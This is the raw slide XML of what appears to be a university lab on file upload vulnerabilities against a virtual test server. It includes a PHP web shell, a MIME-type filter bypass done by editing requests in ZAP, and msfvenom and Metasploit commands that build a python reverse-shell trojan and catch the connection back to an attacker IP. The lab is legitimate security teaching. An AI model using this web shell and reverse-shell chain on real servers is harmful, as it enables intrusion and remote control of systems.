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</p:sldIdLst>
  <p:sldSz cy="5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId57"/>
      <p:bold r:id="rId58"/>
      <p:italic r:id="rId59"/>
      <p:boldItalic r:id="rId60"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato"/>
      <p:regular r:id="rId61"/>
      <p:bold r:id="rId62"/>
      <p:italic r:id="rId63"/>
      <p:boldItalic r:id="rId6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font" Target="fonts/Lato-bold.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-regular.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-boldItalic.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-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font" Target="fonts/Roboto-boldItalic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font" Target="fonts/Roboto-regular.fntdata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font" Target="fonts/Roboto-italic.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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 - Add technical attack flow (with technical tools for each step)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 - Add technical attack flow (with technical tools for each step)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 - Add technical attack flow (with technical tools for each step)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 - Add technical attack flow (with technical tools for each step)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Romain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Shape 4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Shape 4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Victor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Shape 4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Shape 4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Shape 4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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28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en.wikipedia.org/wiki/Software_bug" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Operating_system" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Software_application" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Resource_(computer_science)" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/User_(computing)" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/44298/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Upload Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/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H4413 - TP SERE</a:t>
            </a:r>
            <a:endParaRPr/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8253" y="4652875"/>
            <a:ext cx="496426" cy="32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 rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="44861" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7390201" y="4652875"/>
            <a:ext cx="829373" cy="3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Theory: attack flow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150" y="1020500"/>
            <a:ext cx="7352200" cy="355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Theory: what does contain a malicious file ?</a:t>
            </a:r>
            <a:endParaRPr/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malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> file is a simple php script containing the following code:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr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&lt;?php $cmd=$_GET['cmd']; system($cmd);?&gt;</a:t>
            </a:r>
            <a:endParaRPr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Explanations: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0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&lt;?php ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Basic open and close php tags</a:t>
            </a:r>
            <a:endParaRPr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$cmd=$_GET['cmd'];</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> save the cmd url parameter to the $cmd variable</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="45720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system($cmd); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>execute and display the $cmd variable as a shell command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turn now</a:t>
            </a:r>
            <a:endParaRPr/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7175" y="1371850"/>
            <a:ext cx="4496775" cy="29320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57" name="Shape 157"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1877550" y="2371250"/>
            <a:ext cx="2666400" cy="426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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6366250" y="2217050"/>
            <a:ext cx="2548200" cy="7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Upload script.php</a:t>
            </a:r>
            <a:b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900">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>You can find this file here: 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/home/vagrant/Documents/script.php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59" name="Shape 159"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="158" idx="1"/>
            <a:endCxn id="157" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4544050" y="2584250"/>
            <a:ext cx="1822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turn now</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="165" name="Shape 165"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="24885" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2068625" y="1178050"/>
            <a:ext cx="5006750" cy="27709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turn now</a:t>
            </a:r>
            <a:endParaRPr/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11700" y="9250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your malicious file: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http://10.0.0.20/basic-uplaods/script.php?cmd=pwd</a:t>
            </a:r>
            <a:endParaRPr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/var/www/public/basic-uploads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is the path to your malicious file in the vulnerable web server.</a:t>
            </a:r>
            <a:endParaRPr baseline="3000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2" name="Shape 172"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="40198" l="497" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="666738" y="1937550"/>
            <a:ext cx="7810526" cy="13872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subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241300" y="1845900"/>
            <a:ext cx="4045200" cy="14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current shell user of the vulnerable web server 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it’s operating system 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Question 1</a:t>
            </a:r>
            <a:endParaRPr sz="3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Restrict file upload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Oh sh*t, it does not work with restricted upload...</a:t>
            </a:r>
            <a:endParaRPr/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311700" y="1229875"/>
            <a:ext cx="8520600" cy="4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to upload </a:t>
            </a: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script.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> with the restricted upload form.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311700" y="4018300"/>
            <a:ext cx="4679400" cy="4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How to bypass the server verification ?</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="191" name="Shape 191"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="517" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1810150"/>
            <a:ext cx="8793599" cy="17854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Theory: MIME type</a:t>
            </a:r>
            <a:endParaRPr/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According wikipedia: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/>
              <a:t>A media type (also MIME type and content type) is a two-part identifier for file formats and format contents transmitted on the Internet.</a:t>
            </a:r>
            <a:endParaRPr i="1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Examples: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980000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="-"/>
            </a:pP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image/jpeg</a:t>
            </a:r>
            <a:endParaRPr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800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="-"/>
            </a:pP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audio/mpeg</a:t>
            </a:r>
            <a:endParaRPr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800"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="-"/>
            </a:pP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application/php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...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Theory: Proxy</a:t>
            </a:r>
            <a:endParaRPr/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This schema illustrates how a proxy works: it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>acts as an intermediary for requests from clients seeking resources from other servers</a:t>
            </a:r>
            <a:endParaRPr/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975" y="2165200"/>
            <a:ext cx="6078050" cy="186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File upload vulnerability is a major problem with web based applications. The first step in many attacks is to get some code to the target system. Then the attacker only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.</a:t>
            </a:r>
            <a:endParaRPr sz="14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 this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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practical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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work, you are going to attack a vulnerable web server by uploading a malicious file. You are going to follow 4 differents case:</a:t>
            </a:r>
            <a:endParaRPr sz="14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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng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Basic upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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 it’s a very simple case in order to understand a basic attack flow</a:t>
            </a:r>
            <a:endParaRPr sz="14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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng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Restricted upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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 the web server check the uploaded file MIME type and check if it’s an image. You are going to learn how to bypass this verification.</a:t>
            </a:r>
            <a:endParaRPr sz="14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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng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Upload a trojan and use it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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 you are going to use metasploit framework to generate a trojan, upload it, and use it with a reverse shell.</a:t>
            </a:r>
            <a:endParaRPr sz="14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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng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Bonus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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 privileges escalation with a Linux kernel exploit</a:t>
            </a:r>
            <a:endParaRPr sz="14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Theory: Local Proxy </a:t>
            </a:r>
            <a:endParaRPr/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311700" y="1229875"/>
            <a:ext cx="8520600" cy="12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software installed locally acts like a proxy. It will allow you to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>intercept &amp; modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> every request that you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> through your web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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 your case, this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is called ZAP.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp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575" y="2639063"/>
            <a:ext cx="7562850" cy="122872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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2505150" y="2552700"/>
            <a:ext cx="3147600" cy="1412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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3266400" y="4048200"/>
            <a:ext cx="15579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Attacker machine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turn now - Launch ZAP</a:t>
            </a:r>
            <a:endParaRPr/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 terminal and go to </a:t>
            </a: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/home/vagrant/Documents/ZAP_2.7.0/</a:t>
            </a:r>
            <a:endParaRPr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Launch ZAP software: </a:t>
            </a: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./zap.sh</a:t>
            </a:r>
            <a:endParaRPr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20" name="Shape 220"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6393925" y="1748050"/>
            <a:ext cx="2552075" cy="1923900"/>
            <a:chOff x="4932733" y="1066103"/>
            <a:chExt cx="2740924" cy="2073391"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="221" name="Shape 221"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="0" l="0" r="4997" t="2276"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4932733" y="1066103"/>
              <a:ext cx="2740924" cy="2073391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sp>
          <p:nvSpPr>
            <p:cNvPr id="222" name="Shape 222"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6098125" y="1661275"/>
              <a:ext cx="1467300" cy="1419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23" name="Shape 2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5700" y="2191875"/>
            <a:ext cx="4431326" cy="26333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turn now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Configure firefox</a:t>
            </a:r>
            <a:endParaRPr/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311700" y="1229875"/>
            <a:ext cx="5562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Configure firefox to use your new local proxy:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr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6900" y="1068250"/>
            <a:ext cx="3536925" cy="25809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31" name="Shape 231"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382600" y="2024175"/>
            <a:ext cx="449700" cy="173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Shape 2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4327" y="1763825"/>
            <a:ext cx="3414374" cy="29628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turn now - Start interception</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="238" name="Shape 2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649" y="1931550"/>
            <a:ext cx="4680599" cy="27814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39" name="Shape 239"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551000" y="1190700"/>
            <a:ext cx="4125900" cy="391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Start/stop interception: red =&gt; interception ON</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="240" name="Shape 240"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="239" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2613950" y="1582500"/>
            <a:ext cx="131400" cy="56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1" name="Shape 241"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5087125" y="2423850"/>
            <a:ext cx="3882600" cy="391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 and step to next request or response</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="242" name="Shape 242"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="241" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2903125" y="2182050"/>
            <a:ext cx="2184000" cy="4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turn now - Send malicious file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="248" name="Shape 2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16650"/>
            <a:ext cx="4496775" cy="29320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49" name="Shape 249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="433975" y="3452025"/>
            <a:ext cx="4117800" cy="444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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5648400" y="2717625"/>
            <a:ext cx="2548200" cy="7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Upload script.php</a:t>
            </a:r>
            <a:b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900">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>You can find this file here: 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/home/vagrant/Documents/script.php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51" name="Shape 251"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="250" idx="1"/>
            <a:endCxn id="249" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4551900" y="3084825"/>
            <a:ext cx="1096500" cy="589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turn now - Modify the POST request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="257" name="Shape 2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2175"/>
            <a:ext cx="5849799" cy="34614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58" name="Shape 258"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1271625" y="2717625"/>
            <a:ext cx="1095000" cy="112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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6366275" y="2469825"/>
            <a:ext cx="25482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2/ Modify this!</a:t>
            </a:r>
            <a:b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900">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="9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application/x-php</a:t>
            </a:r>
            <a:endParaRPr sz="90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To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="9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image/jpeg</a:t>
            </a:r>
            <a:endParaRPr sz="90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60" name="Shape 260"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="259" idx="1"/>
            <a:endCxn id="258" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2366675" y="2773725"/>
            <a:ext cx="39996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1" name="Shape 261"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6388925" y="1477725"/>
            <a:ext cx="1802400" cy="77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1/ Make sure ‘intercept’ is ON (red button)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="262" name="Shape 262"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="261" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3447425" y="1519425"/>
            <a:ext cx="2941500" cy="34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3" name="Shape 263"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6465125" y="3299325"/>
            <a:ext cx="1802400" cy="547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/ Submit the modified request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="264" name="Shape 264"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="263" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3581525" y="1472025"/>
            <a:ext cx="2883600" cy="2100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turn now - Congratulation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="270" name="Shape 270"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="18830" l="0" r="0" t="2577"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676150" y="1164250"/>
            <a:ext cx="7791726" cy="11123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71" name="Shape 271"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311688" y="2389525"/>
            <a:ext cx="8520600" cy="12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You can test your malicious file like during the basic upload. Don’t forget to stop interception in ZAP software :)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="272" name="Shape 2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150" y="3265850"/>
            <a:ext cx="6149326" cy="861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idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264975" y="2013300"/>
            <a:ext cx="4045200" cy="11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other verifications the server could perform to be more secured ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Shape 27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Question</a:t>
            </a:r>
            <a:endParaRPr sz="36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pentest tools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/>
              <a:t>Upload a trojan</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3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Theory: The Metasploit Framework</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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311700" y="1229875"/>
            <a:ext cx="8520600" cy="13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Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. It provides several tool to perform a attack (create a custom malicious code called payload, explore a huge exploit database and MUCH MORE...).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="290" name="Shape 2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9275" y="2308338"/>
            <a:ext cx="1363024" cy="1363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Shape 2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8500" y="2725950"/>
            <a:ext cx="2978175" cy="20408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- Network</a:t>
            </a:r>
            <a:endParaRPr/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9277" y="1169100"/>
            <a:ext cx="4325451" cy="311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Theory: Some definitions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and Mac OS X systems are included.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u="sng"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: code that will be executed on the target system upon successful entry; for instance, a remote shell or a VNC server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Theory: reverse shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="303" name="Shape 3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3352" y="1127725"/>
            <a:ext cx="5517300" cy="331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turn now - Create your payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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Msfvenom is a tool to create a custom payload and make it fully undetectable.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Open a terminal and type the following command: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msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=4444</a:t>
            </a:r>
            <a:endParaRPr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It will display a python code which can create a reverse shell from the vulnerable web server.</a:t>
            </a:r>
            <a:endParaRPr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turn now - Create your payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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311700" y="1103650"/>
            <a:ext cx="8520600" cy="5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Copy &amp; paste the highlighted code into a </a:t>
            </a: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trojan.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> file on your desktop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="316" name="Shape 3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275" y="1830325"/>
            <a:ext cx="4750176" cy="28050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17" name="Shape 3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0125" y="1598844"/>
            <a:ext cx="3133624" cy="2230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turn now - Upload your trojan.py</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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Use the basic upload form in order to upload your new </a:t>
            </a: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trojan.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> file.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="324" name="Shape 3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64950"/>
            <a:ext cx="8520600" cy="12665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turn now - Listen for the victim connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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Open a terminal, enter to the msfconsole (metasploit framework console). Type the following commands:</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0"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en" sz="16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lang="en" sz="16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se multi/handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>: tell the metasploit console that you are going to use the multi/handler tool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 sz="16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et PAYLOAD python/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>: configure the exploit to work with a reverse_tcp python payload (you created the payload with msfvenom)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 sz="16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et LHOST 10.0.0.10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>: set the listened IP to the attacker IP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 sz="16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et LPORT 4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>: set the listened port to 4444 (like in your payload)</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a: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exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> the configured tool.</a:t>
            </a:r>
            <a:endParaRPr sz="16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turn now - Execute your payload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311700" y="1229875"/>
            <a:ext cx="8520600" cy="17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your browser and type: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http://10.0.0.20/basic-uploads/script.php?cmd=python trojan.py</a:t>
            </a:r>
            <a:endParaRPr sz="170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Go back to your msfconsole and congratulation, you have a reverse shell with meterpreter!</a:t>
            </a:r>
            <a:endParaRPr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Shape 3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950" y="1087375"/>
            <a:ext cx="5085850" cy="37237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42" name="Shape 34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turn now - Congratulation !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1230725" y="1377250"/>
            <a:ext cx="2824200" cy="173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idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264975" y="19371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</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>vsftp service v.2.3.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> vulnerable ? Why and how ?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/>
              <a:t>Internet is your friend :)</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Shape 34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Question</a:t>
            </a:r>
            <a:endParaRPr sz="36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pentest tools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/>
              <a:t>Bonus : Get root access </a:t>
            </a:r>
            <a:endParaRPr i="1"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Virtuals Machine</a:t>
            </a:r>
            <a:endParaRPr/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5375" y="1112475"/>
            <a:ext cx="3063100" cy="2550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12475"/>
            <a:ext cx="5492000" cy="323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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1223050" y="4369825"/>
            <a:ext cx="40005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Attacker machine with desktop environment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6556925" y="639200"/>
            <a:ext cx="19800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Vulnerable web server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: Privilege escalation </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="10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escalation is the act of exploiting a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, design flaw or configuration oversight in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
